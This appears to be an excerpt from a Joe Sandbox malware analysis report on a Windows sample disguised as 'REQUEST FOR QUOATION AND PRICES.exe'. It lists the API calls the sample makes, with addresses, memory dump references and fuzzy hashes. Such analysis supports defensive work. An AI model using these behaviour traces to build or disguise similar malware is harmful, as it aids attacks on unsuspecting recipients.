                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 390214022-0
                                                                                                                                • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                                • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                                APIs
                                                                                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PathSearch
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2203818243-0
                                                                                                                                • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                                • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                                                                • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                                • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,000001FD,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                                • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                                • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                • CloseClipboard.USER32 ref: 00405658
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                                  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                                                • API String ID: 2246997448-2268674972
                                                                                                                                • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                                • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                                                                • Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                                • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
